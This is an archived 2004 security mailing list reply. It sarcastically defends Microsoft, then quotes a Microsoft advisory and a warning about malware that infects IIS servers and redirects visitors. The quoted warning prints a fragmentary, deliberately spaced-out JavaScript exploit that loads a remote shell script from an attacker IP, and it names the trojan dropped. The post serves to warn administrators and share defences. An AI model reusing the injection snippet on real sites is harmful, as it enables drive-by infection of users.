Full Disclosure mailing list archives
Re: New malware to infect IIS and from there jump to clients
From: <bills.bitch () hushmail com>
Date: Fri, 25 Jun 2004 08:01:33 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This is impossible. Microsoft products are inherently secure. We have a patched IIS as stated by the alert, an alpha security patch for the operating system and open holes in the browser. No doubt this is a vicuous anti-Microsoft attempt to discredit their security commitments by people who are jealous of Bill Gates wealth. That or maybe by disgruntled individuals who failed to earn their MVP status.
For the IIS side.... http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows. Important Customers who have deployed Windows XP Service Pack 2 RC2
are not
at risk. Reports indicate that Web servers running Windows 2000 Server and IIS
that
have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to
attempt
to infect users of Internet Explorer with malicious code. -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Peter
Kruse
Sent: Thursday, June 24, 2004 7:22 PM To: full-disclosure () lists netsys com Subject: [Full-disclosure] New malware to infect IIS and from there
jump to
clients Hi all, This is a heads up. A new malware has been reported from several sources so it appears
to be
fairly widespread already. The malware spreads from infected IIS servers to clients that visit
the
webpage of the infected server. How the IIS servers was compromised
in the
first place is unfortunately still unknown (any info on that would
be
appreciated). The malware redirects a visitor to http: //217.107.218.147/xxx.php.
It does
so by running a javascript that apparently gets appended to several
files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http:// 217.107.218.147/xxx.html that contains the following code: <script language="Javascript"> function InjectedDuringRedirection(){ showModalDialog('md.htm', window, "dialog Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width :1\;").location= " java script:'<SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\'> <\ /script>'"; [snip - you get the picture, right?] I had to put in some spaces to get past trivial content filtering. From that point it will try to run the malware in a 1x1 dialogbox in
the
following order: shellscript_loadxxx.js shellxxx.js The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a trojan-downloader and run it. Consider to deny access to http://217.107.218.147 in your firewall.
This
will at least prevent client PCs from getting infected. Further information can be found in the daily log from SANS: http://isc.sans.org/ Regards Peter Kruse http://www.csis.dk _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it.
-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A n1iDB7VSzmP2NVQyeldO+9agWW8q =Uc5R -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: New malware to infect IIS and from there jump to clients bills.bitch (Jun 25)